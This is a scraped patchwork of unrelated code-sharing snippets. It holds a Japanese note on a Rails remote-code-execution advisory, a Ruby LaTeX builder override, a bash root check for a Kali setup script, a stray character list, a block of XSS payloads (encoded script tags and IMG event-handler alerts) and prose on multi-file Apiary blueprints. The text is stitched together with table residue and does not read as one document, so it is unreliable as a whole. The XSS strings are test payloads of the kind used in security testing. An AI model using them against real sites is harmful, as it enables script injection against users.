- Remote Code Executionとして、Advisoryが更新された。
- https://groups.google.com/d/msg/rubyonrails-security/zRNVOUhKHrg/GmmcVXcmAAAJ
- Thanks to @sorah @tenderlove
module ReVIEW | |
module LATEXBuilderOverride | |
def inline_tt(s) | |
super(s).gsub("'", '\textquotesingle ').sub(/(textquotesingle) }$/, '\1}') | |
end | |
def inline_code(s) | |
super(s).gsub("'", '\textquotesingle ').sub(/(textquotesingle) }$/, '\1}') | |
end | |
end |
#!/bin/bash | |
# Well, entire Kali installation assume that we are normally working as root on our Kali. | |
# I know that assumption sucks to its root, but I wanted to avoid every "permission denied" issue and I was too lazy | |
# to get it done properly as a non-root. | |
if [ $EUID -ne 0 ]; then | |
echo "This script must be run as root." | |
exit 1 | |
fi |
` | |
~/ | |
~ | |
×™× | |
___ | |
__ | |
_ |
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
This document describes 4 different solutions to work APIs that consist of multiple blueprint files. Every of this solution work with all Apiary.io features but editing. To edit a blueprint you have to do it outside of Apiary as Apiary editor does not support working with multiple files. In other words if you are using one of the solutions below avoid editing the blueprint in Apiary.
Hercule is a CLI tool written in Node.js – available as an NPM package. It uses markdown referencing and linking syntax to transclude other files into a blueprint file. This solution is universal and would work with any Markdown files not just API Blueprint.
The major benefit – unlike any other solutions here – is also that the references are rendered as HTML links in any Markdown editor so the result is HTML that can be browsed!